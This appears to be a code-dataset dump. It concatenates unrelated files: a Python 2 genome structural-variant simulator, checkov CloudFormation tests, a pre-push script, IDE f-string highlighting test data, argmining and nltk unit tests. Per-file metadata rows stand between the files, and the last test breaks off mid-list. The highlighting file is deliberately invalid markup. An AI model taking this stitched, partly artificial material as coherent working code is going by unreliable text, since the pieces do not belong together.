        #rec2_start+=1
        new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        # wrap at 60 characters per FASTA line
        new1_seq=[]
        for ka1 in range(len(new1_ref)/60):
            new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
        new1_seq.append(new1_ref[(ka1+1)*60:])
        for ka1 in new1_seq:
            if not ka1=='':
                print >>fo1, ka1
        #new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
        #new2_seq=[]
        #for ka1 in range(len(new2_ref)/60):
        #    new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
        #new2_seq.append(new2_ref[(ka1+1)*60:])
        #for ka1 in new2_seq:
        #    if not ka1=='':
        #        print >>fo2, ka1
        fo1.close()
        #fo2.close()
def fasta_het_write_b(fasta_out):
    """Write haplotype 2 of the heterozygous simulated genome ('.het2.fa').

    Mirrors fasta_het_write_a (haplotype 1); the commented-out lines are the
    haplotype-1 code retained for reference.  For each SV, the alternate
    sequence is emitted only when haplotype 2's allele differs from the
    reference allele.  Uses globals: chromos, order_SV_Pos, chromo_length, ref.
    """
    #fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
    fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
    #fo1.close()
    fo2.close()
    #print fasta_out.replace('.het.fa','.het1.fa')
    print fasta_out.replace('.het.fa','.het2.fa')
    for k1 in chromos:
        #fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
        fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
        #print >>fo1, '>'+k1
        print >>fo2, '>'+k1
        #new1_ref=''
        #rec1_start=0
        new2_ref=''
        rec2_start=0
        for k2 in sorted(order_SV_Pos[k1].keys()):
            print [k1,k2]
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            #rec1_start+=1
            #new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            #if not k3[0][1][0]==k3[0][1][2]:
            #    new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            #else:
            #    new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            #rec1_start=end
            # reference gap between the previous SV (or start) and this SV
            rec2_start+=1
            new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
            # k3[0][1] = [hap1, hap2, ref]; alt sequence only if hap2 != ref
            if not k3[0][1][1]==k3[0][1][2]:
                new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
            else:
                new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            rec2_start=end
        #rec1_start+=1
        # trailing reference segment to the chromosome end
        rec2_start+=1
        #new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        #new1_seq=[]
        #for ka1 in range(len(new1_ref)/60):
        #    new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
        #new1_seq.append(new1_ref[(ka1+1)*60:])
        #for ka1 in new1_seq:
        #    if not ka1=='':
        #        print >>fo1, ka1
        new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
        # wrap at 60 characters per FASTA line
        new2_seq=[]
        for ka1 in range(len(new2_ref)/60):
            new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
        new2_seq.append(new2_ref[(ka1+1)*60:])
        for ka1 in new2_seq:
            if not ka1=='':
                print >>fo2, ka1
        #fo1.close()
        fo2.close()
def Sample_info_ReadIn(Sam_File):
    """Load per-type SV statistics into the global sv_hash.

    Each non-empty line is '<type> <count> <num...>'; numeric fields are
    parsed as ints and the leading count is inflated by 1.25x (truncated).
    The original duplicated the append logic across the if/else branches;
    this version folds them together — behaviour is unchanged.
    """
    fi=open(Sam_File)
    for line in fi:
        pin=line.strip().split()
        if pin==[]:
            continue
        sv_hash.setdefault(pin[0],[])
        row=[int(i) for i in pin[1:]]
        row[0]=int(row[0]*1.25)
        sv_hash[pin[0]].append(row)
    fi.close()
def sv_total_num_calcu():
    """Sum the (scaled) SV counts over the four global stat tables.

    Reads the globals del_stat, dup_stat, inv_stat and tra_stat, each a
    list of rows whose first element is a count.
    """
    return sum(row[0] for row in del_stat+dup_stat+inv_stat+tra_stat)
def pick_random_seqs(ref,sv_total_num,chromo_length):
    """Harvest random 20-50 bp genomic sequences to serve as micro-insertions.

    Picks ~2 * 12% * sv_total_num sequences, apportioned to autosomes by
    length (chromosomes containing 'GL' and X/Y/MT are excluded), fetched
    with ``samtools faidx``; candidates containing a poly-N run are
    discarded.  Returns {chromosome: [sequence, ...]}.
    """
    #12% of all SVs have micro insrts at both /either ends
    #double number of seqs would be randomly picked from genome as long micro-insertions
    num_micro_ins_over20bp=float(sv_total_num)*0.12*2
    genome_length=0
    chromos_num_regions={}
    chrom_seqs={}
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:
            genome_length+=chromo_length[x]
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:
            # share of the picks proportional to chromosome length
            chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
    for x in chromos_num_regions.keys():
        chrom_seqs[x]=[]
        int_num=int(round(chromos_num_regions[x]))
        # anchor points, 10kb away from chromosome ends
        seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
        for y in sorted(seq_pick):
            length_pick=random.sample(range(20,50),1)[0]
            seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
            seqs.readline()
            test=seqs.readline().strip()
            # reject gap regions (runs of N)
            if not 'NNNNNNNN' in test:
                chrom_seqs[x].append(test)
            seqs.close()
    return chrom_seqs
def produce_random_seqs(length):
    """Return a random DNA string of *length* bases, uniform over A/T/G/C."""
    bases=['A','T','G','C']
    return ''.join(random.choice(bases) for _ in range(length))
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
    """Build the alternate-allele sequence described by *letter_new*.

    Operative redefinition of the earlier Ref_Alt_Produce: additionally
    appends a micro-insertion chosen by ``insert_read_decide`` (defined
    elsewhere in this file) — for an empty allele the insertion alone is
    returned, otherwise it is appended after the rearranged blocks.
    bp_list mixes chromosome names (members of ChromoList) and breakpoint
    coordinates; adjacent coordinate pairs become blocks 'a','b',... whose
    sequences come from ``samtools faidx``; a '^' suffix in letter_new
    selects the reverse complement of a block.
    """
    #Chromo=Chr, target chromosome
    #BamN: DG187, DG196... name of sample
    #eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
    #Eg of flank: flank : 446
    if letter_new=='':
        return insert_read_decide(bp_list)
    else:
        bp_hash={}
        bp_seq=[]
        # group coordinates under their chromosome name
        for k1 in bp_list:
            if k1 in ChromoList:
                bp_seq.append([k1])
            else:
                bp_seq[-1].append(k1)
        rec=0
        # label every adjacent coordinate pair 'a','b',...
        for k1 in bp_seq:
            for k2 in range(len(k1)-2):
                rec+=1
                bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
        letter_seq={}
        for k1 in bp_hash.keys():
            Chromo=bp_hash[k1][0]
            region_left=bp_hash[k1][1]
            region_right=bp_hash[k1][2]
            seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
            seq.readline().strip().split()
            lines=[]
            while True:
                line=seq.readline().strip().split()
                if not line: break
                lines.append(line)
            Seq1=lines[0][0]
            # unlike the earlier definition, guards against single/empty lines
            if len(lines)>1:
                for j in range(len(lines))[1:]:
                    if not lines[j]==[]:
                        Seq1=''.join([Seq1,lines[j][0]])
            letter_seq[k1]=Seq1
            # '<letter>^' maps to the reverse complement of the block
            letter_seq[k1+'^']=reverse(complementary(Seq1))
        new_Seq=''
        new_letter=[]
        # re-attach '^' markers to their letters, then concatenate block sequences
        for k1 in letter_new:
            if not k1=='^':
                new_letter.append(k1)
            else:
                new_letter[-1]+=k1
        for k1 in new_letter:
            new_Seq+=letter_seq[k1]
        # trailing micro-insertion (may be empty)
        new_Seq+=insert_read_decide(bp_list)
        return new_Seq
# ---- script entry: simulate complex SVs and emit VCF + two haplotype fastas.
# Usage flags: --reference, --input-sim (per-type SV stats), --input-rec
# (complex-SV composition table), --output-prefix.
# NOTE(review): csv_region_pick, csv_rec_write, csv_info_rewrite,
# tra_info_add, hash_reorder and fasta_comp_write_a are defined elsewhere
# in this file.
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
refs=dict_opts['--reference']
ref=refs
score_Cff=-20
Sam_File=dict_opts['--input-sim']
# sv_hash: size -> SV-type bookkeeping, filled from the --input-sim table
sv_hash={}
Sample_info_ReadIn(Sam_File)
sv_stat=sv_stat_calcu(sv_hash,'DEL')
sv_size=sv_size_pick(sv_stat)
sv_total_num=sum([i[0] for i in sv_hash[sv_hash.keys()[0]]])
# chromos_readin returns [genome_length, chromos, regions_per_chromo, length_by_chromo]
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
# csv_hash: ref structure -> alt structures; csv1/csv2_hash: frequency weights
csv_hash={}
fin=open(dict_opts['--input-rec'])
csv1_hash={}
csv2_hash={}
for line in fin:
    pin=line.strip().split()
    if not pin[0] in csv_hash.keys():
        csv_hash[pin[0]]=[]
    if not pin[1] in csv_hash[pin[0]]:
        csv_hash[pin[0]].append(pin[1])
    if not pin[0] in csv1_hash.keys():
        csv1_hash[pin[0]]=0
    csv1_hash[pin[0]]+=int(pin[-1])
    if not pin[1] in csv2_hash.keys():
        csv2_hash[pin[1]]=0
    csv2_hash[pin[1]]+=int(pin[-1])
fin.close()
# frequency-weighted sampling pools for ref and alt structures
csv1_keys=[]
for i in csv_hash.keys():
    csv1_keys+=[i for j in range(csv1_hash[i])]
csv1_csv2_hash={}
for k1 in csv_hash.keys():
    csv1_csv2_hash[k1]=[]
    for k2 in csv_hash[k1]:
        csv1_csv2_hash[k1]+=[k2 for j in range(csv2_hash[k2])]
overlap_hash={}
SV_region=csv_region_pick(sv_size)
ordered_sv_info=csv_rec_write(SV_region)
sv_info=csv_info_rewrite(SV_region)
# per-chromosome SV component tables filled by the *_info_add helpers
del1={}
dup1={}
inv1={}
tra1={}
for k1ab in sorted(sv_info.keys()):
    for k2ab in sv_info[k1ab].keys():
        if not k2ab==k1ab:
            tra_info_add(k1ab,k2ab)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.comp.fa'
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Comp_write(sv_info)
order_SV_Het_write(sv_info)
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
fasta_comp_write_a(fasta_out)
fasta_comp_write_b(fasta_out)
# index the two haplotype fastas so downstream tools can use them
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.comp.fa','.comp1.fa')))
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.comp.fa','.comp2.fa')))
| 36.904358
| 336
| 0.550891
| 25,520
| 152,415
| 3.120572
| 0.021003
| 0.028253
| 0.014164
| 0.012883
| 0.950174
| 0.938986
| 0.928526
| 0.923578
| 0.920464
| 0.913796
| 0
| 0.074352
| 0.246846
| 152,415
| 4,129
| 337
| 36.913296
| 0.619399
| 0.053499
| 0
| 0.921173
| 0
| 0.009439
| 0.074958
| 0.027134
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.009184
| 0.003061
| null | null | 0.048724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
54bdc659df861341b8f324d23add000b4c1c3b98
| 6,742
|
py
|
Python
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 3
|
2021-04-19T17:17:21.000Z
|
2021-09-06T06:31:09.000Z
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 16
|
2021-03-09T07:38:38.000Z
|
2021-06-09T03:53:55.000Z
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 1
|
2021-03-07T07:23:39.000Z
|
2021-03-07T07:23:39.000Z
|
import os
import unittest
from checkov.cloudformation import cfn_utils
from checkov.cloudformation.parser import parse
from checkov.runner_filter import RunnerFilter
from checkov.cloudformation.runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_record_relative_path_with_relative_dir(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_dir_path = os.path.join(current_dir, "resources")
# this is the relative path to the directory to scan (what would actually get passed to the -d arg)
dir_rel_path = os.path.relpath(scan_dir_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=dir_rel_path, external_checks_dir=None,
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{dir_rel_path}{record.file_path}')
def test_record_relative_path_with_abs_dir(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_dir_path = os.path.join(current_dir, "resources")
dir_rel_path = os.path.relpath(scan_dir_path)
dir_abs_path = os.path.abspath(scan_dir_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=dir_abs_path, external_checks_dir=None,
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{dir_rel_path}{record.file_path}')
def test_record_relative_path_with_relative_file(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_file_path = os.path.join(current_dir, "resources", "success.json")
# this is the relative path to the file to scan (what would actually get passed to the -f arg)
file_rel_path = os.path.relpath(scan_file_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=None, external_checks_dir=None, files=[file_rel_path],
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{file_rel_path}')
def test_record_relative_path_with_abs_file(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_file_path = os.path.join(current_dir, "resources", "success.json")
file_rel_path = os.path.relpath(scan_file_path)
file_abs_path = os.path.abspath(scan_file_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=None, external_checks_dir=None, files=[file_abs_path],
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{file_rel_path}')
def test_get_tags(self):
    """cfn_utils.get_resource_tags: resolves plain and Fn::Sub tag values,
    stringifies Ref-based values verbatim, and returns None for resources
    without usable tags."""
    current_dir = os.path.dirname(os.path.realpath(__file__))
    scan_file_path = os.path.join(current_dir, "resources", "tags.yaml")
    definitions, _ = parse(scan_file_path)

    # Bucket with four tags, including short- and long-form sub values.
    resource_name = 'DataBucket'
    resource = definitions['Resources'][resource_name]
    entity = {resource_name: resource}
    entity_tags = cfn_utils.get_resource_tags(entity)
    self.assertEqual(len(entity_tags), 4)
    tags = {
        'Simple': 'Value',
        'Name': '${AWS::AccountId}-data',
        'Environment': 'long-form-sub-${account}',
        'Account': 'long-form-sub-${account}'
    }
    for name, value in tags.items():
        self.assertEqual(entity_tags[name], value)

    # Resource with no Tags property yields None.
    resource_name = 'NoTags'
    resource = definitions['Resources'][resource_name]
    entity = {resource_name: resource}
    entity_tags = cfn_utils.get_resource_tags(entity)
    self.assertIsNone(entity_tags)

    # Fix: removed a stray bare string literal ('TerraformServerAutoScalingGroup')
    # that sat here as a no-op expression statement.
    resource_name = 'TerraformServerAutoScalingGroup'
    resource = definitions['Resources'][resource_name]
    entity = {resource_name: resource}
    entity_tags = cfn_utils.get_resource_tags(entity)
    self.assertIsNone(entity_tags)

    # Nodegroup whose Name tag embeds Ref dicts, stringified verbatim.
    resource_name = 'EKSClusterNodegroup'
    resource = definitions['Resources'][resource_name]
    entity = {resource_name: resource}
    entity_tags = cfn_utils.get_resource_tags(entity)
    self.assertEqual(len(entity_tags), 1)
    tags = {
        'Name': '{\'Ref\': \'ClusterName\'}-EKS-{\'Ref\': \'NodeGroupName\'}'
    }
    for name, value in tags.items():
        self.assertEqual(entity_tags[name], value)
def tearDown(self):
    # No per-test cleanup is needed; kept as an explicit extension point.
    pass
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 42.942675
| 108
| 0.675319
| 886
| 6,742
| 4.887133
| 0.14447
| 0.038799
| 0.025404
| 0.018476
| 0.854965
| 0.854965
| 0.845727
| 0.823326
| 0.816859
| 0.772748
| 0
| 0.002711
| 0.234055
| 6,742
| 156
| 109
| 43.217949
| 0.835786
| 0.202611
| 0
| 0.616162
| 0
| 0
| 0.100243
| 0.036961
| 0
| 0
| 0
| 0
| 0.141414
| 1
| 0.060606
| false
| 0.050505
| 0.060606
| 0
| 0.131313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
49bb484f4b29afb69b74c05485c40ac6e3222ca3
| 113
|
py
|
Python
|
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | 4
|
2021-06-25T11:14:42.000Z
|
2021-12-20T22:02:13.000Z
|
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | null | null | null |
pre_push.py
|
ralvescosta/iot_mqtt_amqp
|
d54131f04af2c21e4c8a638b10362902e22547aa
|
[
"MIT"
] | null | null | null |
"""Pre-push hook: run the staged test suites of both services.

Exits non-zero when either suite fails so the push is aborted.
"""
import os
import sys

# os.system returns the raw wait status; non-zero means the command failed.
# Run both suites even if the first fails, then combine the statuses.
status = os.system('cd ./mqtt_bridge && yarn test:staged')
status |= os.system('cd ./iot_consumer && yarn test:staged')

# Fix: the original discarded both statuses, so a failing suite could
# never block the push; propagate failure explicitly.
sys.exit(1 if status else 0)
| 22.6
| 50
| 0.699115
| 18
| 113
| 4.277778
| 0.611111
| 0.207792
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123894
| 113
| 5
| 50
| 22.6
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.640351
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
b72a4a4af4a9019e6096e2aee342aa212dbcdda9
| 1,541
|
py
|
Python
|
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
python/testData/highlighting/fStringTooDeeplyNestedExpressionFragments.py
|
Tasemo/intellij-community
|
50aeaf729b7073e91c7c77487a1f155e0dfe3fcd
|
[
"Apache-2.0"
] | null | null | null |
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">}</error></error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected"><error descr="Expression fragments inside f-strings cannot include line comments"># foo}}}'</error></error></error><EOLError descr="Type conversion, ':' or '}' expected"></EOLError><EOLError descr="' expected"></EOLError>
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z<error descr="An illegal conversion character 'z': should be one of 's', 'r', 'a'">!z</error>}</error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z:<error descr="Expression fragment inside an f-string is nested too deeply">{42}</error>}</error>}}'
f'{<error descr="Expression expected">:</error>{<error descr="Expression expected">:</error><error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">:</error><error descr="Expression fragment inside an f-string is nested too deeply">{<error descr="Expression expected">}</error></error>}</error>}}'
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z</error><error descr="'}' expected">'</error>
f'{x:{y:<error descr="Expression fragment inside an f-string is nested too deeply">{z</error><EOLError descr="Type conversion, ':' or '}' expected"></EOLError><EOLError descr="' expected"></EOLError>
| 220.142857
| 352
| 0.724205
| 226
| 1,541
| 4.938053
| 0.163717
| 0.16129
| 0.286738
| 0.225806
| 0.862903
| 0.862903
| 0.862903
| 0.862903
| 0.833333
| 0.833333
| 0
| 0.001426
| 0.089552
| 1,541
| 7
| 353
| 220.142857
| 0.794013
| 0
| 0
| 0
| 0
| 1
| 0.894293
| 0.180285
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
b750feb3ebbdfc5bf09f116c7d6d4bf421358797
| 2,058
|
py
|
Python
|
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | 13
|
2018-01-26T13:20:53.000Z
|
2022-03-04T15:26:59.000Z
|
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | null | null | null |
tests/features/test_polarity_sentiws_polarity_bearing_tokens_feature.py
|
ertogrul/ArgMining
|
2b7777ad6172723ece1cfe8df09c47c5c362ef5d
|
[
"MIT"
] | 6
|
2018-04-11T15:27:42.000Z
|
2020-12-10T13:34:06.000Z
|
import unittest
import argmining.features.sentiws_polarity_bearing_tokens_feature as sentiws_polarity_bearing_tokens_feature
from argmining.models.thf_sentence_export import THFSentenceExport
from argmining.models.token import Token
class THFSentenceSentiWSPolarityBearingTokens(unittest.TestCase):
    """Tests for count_polarity_bearing_tokens.

    As exercised here, the feature counts tokens whose SentiWS polarity
    score (the 8th Token constructor argument) is present, and returns
    that count wrapped in a single-element list.
    """

    def _feature_for_polarities(self, polarities):
        """Build a sentence whose tokens carry the given polarity scores
        (None = no score) and return the computed feature value."""
        tokens = [Token(index, None, None, None, None, None, None, polarity)
                  for index, polarity in enumerate(polarities, start=1)]
        thf_sentence = THFSentenceExport(None, None, None, tokens, None, 1)
        return sentiws_polarity_bearing_tokens_feature.count_polarity_bearing_tokens(thf_sentence)

    def test_count_polarity_bearing_tokens_example1(self):
        # Two of the three tokens carry a polarity score.
        self.assertEqual(self._feature_for_polarities([0.5, None, 1.5]), [2])

    def test_count_polarity_bearing_tokens_example2(self):
        # No token carries a polarity score.
        self.assertEqual(self._feature_for_polarities([None, None, None]), [0])

    def test_count_polarity_bearing_tokens_example3(self):
        # Negative scores count as polarity-bearing as well.
        self.assertEqual(self._feature_for_polarities([None, -1, -1.5]), [2])
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 50.195122
| 108
| 0.720117
| 261
| 2,058
| 5.402299
| 0.153257
| 0.317731
| 0.374468
| 0.363121
| 0.828369
| 0.778723
| 0.755319
| 0.751773
| 0.751773
| 0.751773
| 0
| 0.01481
| 0.179786
| 2,058
| 40
| 109
| 51.45
| 0.820498
| 0
| 0
| 0.529412
| 0
| 0
| 0.003887
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 1
| 0.088235
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b754321da784b85474b35adc06891d5a2c5f22ce
| 107
|
py
|
Python
|
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | 1
|
2022-02-04T18:10:04.000Z
|
2022-02-04T18:10:04.000Z
|
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | null | null | null |
test/test_translations.py
|
kinderp/python-package-tutorial
|
9b5b6bc19e75844b6a3119d2621dd1fd63d3c81c
|
[
"MIT"
] | null | null | null |
from imppkg.say import main
from imppkg.hello import say_hello
def test_always_passed():
    """Smoke test: always succeeds, confirming the test runner is wired up."""
    assert True
| 15.285714
| 34
| 0.785047
| 17
| 107
| 4.764706
| 0.705882
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.168224
| 107
| 6
| 35
| 17.833333
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
b7a7cf13eac4440a30a8250ff7fa9edeb54bd5b5
| 31,536
|
py
|
Python
|
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
nltkma/test/unit/test_concordance.py
|
aydtmiri/nltk-ma
|
5d7dd01844ee063fc910a648948624b6a2dddaf9
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from io import StringIO
from nltkma.text import find_concordance
from nltkma.collocations import BigramCollocationFinder, BigramAssocMeasures
class TestConcordance(unittest.TestCase):
"""Text constructed using: http://www.nltk.org/book/ch01.html"""
def test_concordance_list_1(self):
    """Pivot 'minority' / target 'asian' with span (3, 3) and context
    window (1, 10): checks line, spans, contexts and query of the first
    concordance result.

    NOTE(review): ',' 'piece' in corpus_token is implicit string
    concatenation (yielding ',piece'); the expected strings rely on it,
    so it looks deliberate rather than a missing comma — confirm.

    NOTE(review): a later method re-uses this exact name, so this
    definition is shadowed and never runs as written.
    """
    corpus_token = ['Traditionally', ',', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text', 'is',
                    'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'BAME', 'Asian', 'understood', 'minority',
                    ',', 'asian', 'to', 'be', 'a', ',' 'piece', 'of', 'written', 'or', 'spoken', 'material', '.',
                    'in', 'its', 'primary', 'form', '(', 'as', 'opposed', 'to', 'a', 'paraphrase', 'or']
    corpus_token_cleaned = ['Traditionally', 'black', 'Black', 'Asians', 'Blacks', 'blacks', 'bame', 'a', 'text',
                            'is',
